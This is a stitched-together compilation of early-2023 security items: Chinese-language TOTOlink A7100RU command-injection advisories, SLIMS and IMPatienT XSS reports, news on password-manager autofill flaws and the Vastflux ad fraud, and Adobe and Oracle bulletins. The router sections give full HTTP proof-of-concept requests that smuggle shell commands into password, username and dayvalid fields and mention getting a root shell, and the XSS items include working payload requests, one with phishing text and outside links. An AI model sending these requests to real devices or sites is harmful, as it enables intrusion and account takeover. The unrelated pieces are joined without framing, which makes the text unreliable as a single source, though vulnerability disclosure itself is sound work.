TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the password parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取password参数下的内容传递给v26，之后将v26传递给v28，最后将v28带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"password":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48125: ttt/13 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the username parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取username参数中的内容传递给v51，之后将v51带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"username":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48126: ttt/12 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the dayvalid parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取dayvalid参数中的内容传递给v9，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"dayvalid":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48122: ttt/17 at main · Am1ngl/ttt

Dashlane, Bitwarden, and Safari all cited by Google researchers

Dashlane, Bitwarden, and Safari all cited by Google researchers

Security shortcomings mean that multiple password managers could be tricked into auto-filling credentials on untrusted pages, security researchers at Google warn.

The team from Google went public with their findings on Tuesday (17 January), 90 days after notifying the applications – Dashlane, Bitwarden, and the built-in password manager bundled with Apple’s Safari browser – of the vulnerabilities.

Both Dashlane and Bitwarden have updated their software although Dashlane, at least, remains unconvinced that the bug represents any kind of security threat. The status of any fix for Apple’s Safari built-in password manager remains unconfirmed at the time of writing. The Daily Swig has asked Apple to comment and we’ll update this story as and when more information comes to hand.

Catch up with the latest cybersecurity research news

The security shortcomings outlined by Google mean that the vulnerable password managers auto-fill credentials into untrusted pages, without first requiring users to enter their master password.

An advisory from Google explains that the issue arises in two scenarios: where web pages have a CSP (content security policy) sandbox response header or where forms are inside a sandboxed iframe.

Auto-filling by password managers should not happen in either scenario but the affected applications all fail in this regard when encountering sandboxed content. Other password managers (including LastPass, 1Password, and Google Chrome’s password vault technology) avoid this mistake, said Google.

“Password managers should check whether content is sandboxed before auto-filling credentials. This can be done in many ways, but one way is to check self.origin of a page and refusing to fill in credentials if self.origin is ‘null’,” according to the Google advisory.

**Real world impact**

In response to a query from The Daily Swig, Bitwarden confirmed that the issue had been resolved through a recent pull request. Dashlane told The Daily Swig that it had also updated its technology even though it remains unconvinced there was a substantive problem in play.

“We’ve changed the behavior following the report (so the advisory is misleading),” Dashlane said. “We also don’t believe that it was a real issue to start with (the author doesn’t detail any real attack scenario nor answer our questions).”

Google is yet to respond to a request from The Daily Swig to respond to Dashlane’s criticisms of its research findings.

YOU MAY ALSO LIKE Google pays hacker duo $22k in bug bounties for flaws in multiple cloud projects

Popular password managers auto-filled credentials on untrusted websites

Mainly Apple iOS in-app ads were targeted, injecting malicious JavaScript code to rack up phony views.

A sprawling new adware campaign that abused the Vast video ad server template to rack up fraudulent digital advertising views on an enormous scale has been shut down.

At its peak, the adware effort hit more than 12 billion requests per day.

Human Security's Satori threat intelligence team uncovered the adware campaign, touting it as the largest find in the cybersecurity research group's history. Following the discovery, Satori said it led a takedown of the ad fraud operation, which they dubbed as Vastflux.

The team added in its report that, in all, Vastflux spoofed more than 1,700 apps, targeted 1,200 publishers, and displayed ads on applications running on about 11 million devices.

"What was technically impressive and incredibly concerning about Vastflux \[were\] the fraudsters hijacked impressions on legitimate apps, which makes it nearly impossible for users to tell if they are impacted," Gavin Reid, Human's CISO, said.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Massive Adware Campaign Shuttered

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

Some 1,700 spoofed apps, 120 targeted publishers, 12 billion false ad requests per day—Vastflux is one of the biggest ad frauds ever discovered.

Every time you open an app or website, a flurry of invisible processes takes place without you knowing. Behind the scenes, dozens of advertising companies are jostling for your attention: They want their ads in front of your eyeballs. For each ad, a series of instant auctions often determines which ads you see. This automated advertising, often known as programmatic advertising, is big business, with $418 billion spent on it last year. But it’s also ripe for abuse.

Security researchers today revealed a new widespread attack on the online advertising ecosystem that has impacted millions of people, defrauded hundreds of companies, and potentially netted its creators some serious profits. The attack, dubbed Vastflux, was discovered by researchers at Human Security, a firm focusing on fraud and bot activity. The attack impacted 11 million phones, with the attackers spoofing 1,700 app and targeting 120 publishers. At its peak, the attackers were making 12 billion requests for ads per day.

“When I first got the results for the volume of the attack, I had to run the numbers multiple times,” says Marion Habiby, a data scientist at Human Security and the lead researcher on the case. Habiby describes the attack as both one of the most sophisticated the company has seen and the largest. “It is clear the bad actors were well organized and went to great lengths to avoid detection, making sure the attack would run as long as possible—making as much money as possible,” Habiby says. 

Online and mobile advertising is a complex, often murky business. But it generates piles of money for those involved. Every day billions of ads are placed on websites and in apps—advertisers or ad networks pay to have their ads displayed and make money when people click on them or see them—and much of this is done as you open a website or an app.

Vastflux was first detected by Human Security researcher Vikas Parthasarathy in the summer of 2022 while he was investigating a different threat. Habiby says operating the fraud involved multiple steps, and the attackers behind it took a range of measures to avoid being caught out.

First, the group behind the attack—which Human Security hasn’t named due to ongoing investigations—would target popular apps and try to buy an advertising slot within them. “They were not trying to hijack an entire phone, or an entire app, they were literally going through one ad slot,” Habiby says. 

Once Vastflux won the auction for an ad, the group would insert some malicious JavaScript code into that ad to stealthily allow multiple video ads to be stacked on top of each other. 

Put simply, the attackers were able to hijack the advertising system so that when a phone was displaying an ad within an affected app, there would actually be up to 25 ads placed on top of each other. The attackers would get paid for each ad, and you would only see one ad on your phone. However, your phone battery would drain faster than usual as it processed all the fraudulent ads.

“It’s quite genius because the minute the ad disappears, your attack stops, which means that you’re not going to be found easily,” Habiby explains. 

The scale of this was colossal: In June 2022, at the peak of the group’s activity, it made 12 billion ad requests per day. Human Security says the attack primarily impacted iOS devices, although Android phones were also hit. In total, the fraud is estimated to have involved 11 million devices. There is little device owners could have done about the attack, as legitimate apps and advertising processes were impacted. 

Google spokesperson Michael Aciman says the company has strict policies against “invalid traffic” and there was limited Vastflux “exposure” on its networks. “Our team thoroughly evaluated the report’s findings and took prompt enforcement action,” Aciman says. Apple did not respond to WIRED's request for comment.

Mobile ad fraud can take many different forms. This can range, as with Vastflux, from types of ad stacking and phone farms to click farms and SDK spoofing. For phone owners, batteries dying quickly, large jumps in data use, or screens turning on at random times could be signs a device is being impacted by ad fraud. In November 2018, the FBI’s biggest ad fraud investigation charged eight men with running two notorious ad fraud schemes. (Human Security and other technology companies were involved in the investigation.) And in 2020, Uber won an ad fraud lawsuit after a company it hired to get more people to install its app did so through “click flooding.”

In the case of Vastflux, the biggest impact of the attack was arguably on those involved in the sprawling advertising industry itself. The fraud affected both advertising companies and apps that show ads. “They were trying to defraud all these different groups along the supply chain, with different tactics against very different ones,” says Zach Edwards, a senior manager of threat insights at Human Security. 

To avoid being detected—up to 25 simultaneous ad requests from one phone would look suspicious—the group used multiple tactics. They spoofed the advertising details of 1,700 apps, making it look like lots of different apps were involved in showing the ads, when only one was being used. Vastflux also modified its ads to only allow certain tags to be attached to adverts, helping it avoid detection. 

Matthew Katz, head of marketplace quality at FreeWheel, a Comcast-owned ad tech company that was partly involved in the investigation, says attackers in the space are becoming increasingly sophisticated. “Vastflux was an especially complicated scheme,” Katz says. 

The attack involved some significant infrastructure and planning, the researchers say. Edwards says Vastflux used multiple domains to launch its attack. The name Vastflux is based on “fast flux”—an attack type hackers use that involves linking multiple IP addresses to one domain name—and VAST, a template for video advertising, developed by a working group within the  Interactive Advertising Bureau (IAB), that was abused in the attack. (Shailley Singh, executive vice president, product and chief operating officer at IAB Tech Lab, says using the VAST 4 version of its template can help prevent attacks like Vastflux, and other technical measures from publishers and ad networks would help reduce its effectiveness.) “It’s not the very simple kind of fraud scheme that we see all the time,” Habiby says.

The researchers refused to reveal who may be behind the Vastflux—or how much money they potentially made—citing ongoing investigations. However, they say they’ve seen the same criminals running advertising fraud efforts as far back as 2020. In that instance, the ad fraud scheme was targeting US swing states and allegedly collecting users’ data.

For now, at least, Vastflux has been stopped. In June of last year, Human Security and several companies it has partnered with to take action against ad fraud began actively combating the group and the attack. Three separate disruptions of Vastflux took place during June and July 2022, dropping the number of ad requests from the attack to under a billion per day. “We identified the bad actors behind the operation and worked closely with abused organizations to mitigate the fraud,” the company said in a blog post.

In December, the actors behind the attack took down the servers, and Human Security hasn’t seen any activity from the group since then. Tamer Hassan, the firm’s CEO, says there are multiple actions people can take against criminal actors, some of which may lead to law enforcement action. However, money matters. Stopping attackers from profiting will reduce the attacks. “Winning the economic game is how we win as an industry against cybercriminals,” Hassan says.

_Update 11:55 am ET, January 19, 2023: Added comment from an IAB representative._

A Sneaky Ad Scam Tore Through 11 Million Phones

Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB23-01  

**Bulletin ID**

**Date Published**

**Priority**

APSB23-01  

January 10, 2023

3

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to application denial-of-service, arbitrary code execution, privilege escalation and memory leak.                         

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

22.003.20282 (Win), 22.003.20281 (Mac) and earlier versions

Windows &  macOS

Acrobat Reader DC

Continuous 

22.003.20282 (Win), 22.003.20281 (Mac) and earlier versions

Windows & macOS

Acrobat 2020  

Classic 2020             

20.005.30418 and earlier versions

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.005.30418 and earlier versions  

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

For questions regarding Acrobat Reader DC, please visit the Acrobat Reader DC FAQ page.     

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

22.003.20310  

Windows and macOS

3

Release Notes     

Acrobat Reader DC

Continuous

22.003.20310  

Windows and macOS

3

Release Notes     

Acrobat 2020  

Classic 2020             

20.005.30436  

Windows  and macOS    

3

Release Notes     

Acrobat Reader 2020  

Classic 2020   

20.005.30436  

Windows  and macOS   

3

Release Notes   

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Integer Overflow or Wraparound (CWE-190)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21579  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21581  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21585  

NULL Pointer Dereference (CWE-476)  

Application denial-of-service  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H  

CVE-2023-21586  

Stack-based Buffer Overflow (CWE-121)  

Arbitrary code execution  

Critical  

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21604  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21605  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical  

7.8  

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21606  

Improper Input Validation (CWE-20)  

Arbitrary code execution  

Critical  

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21607  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical  

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21608  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21609  

Stack-based Buffer Overflow (CWE-121)  

Arbitrary code execution  

Critical  

7.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N  

CVE-2023-21610  

Violation of Secure Design Principles (CWE-657)  

Privilege escalation  

Important

6.4

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21611  

Violation of Secure Design Principles (CWE-657)  

Privilege escalation  

Important  

5.6

CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N  

CVE-2023-21612  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21613  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21614  

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   0x1byte working with Trend Micro Zero Day Initiative - CVE-2023-21579, CVE-2023-21581, CVE-2023-21605  
    
*   Koh M. Nakagawa (Ko Kato) (tsunekoh) - CVE-2023-21611, CVE-2023-21612
*   Mat Powell with Trend Micro Zero Day Initiative - CVE-2023-21585, CVE-2023-21606, CVE-2023-21607, CVE-2023-21613,  CVE-2023-21614  
    
*   KMFL (kmfl) - CVE-2023-21586
*   Anonymous working with Trend Micro Zero Day Initiative - CVE-2023-21609  
    
*   Vancir (vancir) - CVE-2023-21610  
    
*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative- CVE-2023-21608

**Revisions:**

November 7, 2022: Revised acknowledgement for CVE-2022-38437

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2023-21614: Adobe Security Bulletin

Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections).  Supported versions that are affected are 12.1 and  12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management.  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

CVE-2023-21850: Oracle Critical Patch Update Advisory - January 2023

IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.

A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637):

Description:  
IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify\_onto request.  
This may allow attackers to steal Protected Health Information (PHI).

Suggested Fix:  
Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, you could consider encoding the user input using HTML or URL methods.

Reference:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637  
https://nvd.nist.gov/vuln/detail/CVE-2023-23637  
https://owasp.org/www-project-top-ten/2017/A7\_2017-Cross-Site\_Scripting\_(XSS)

Payload:

    PATCH /modify_onto HTTP/1.1
    Host: 127.0.0.1:5000
    Content-Length: 2218
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
    Origin: http://127.0.0.1:5000/
    Referer: http://127.0.0.1:5000/ontocreate
    Connection: close
    
    [{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}]

Tag

#apple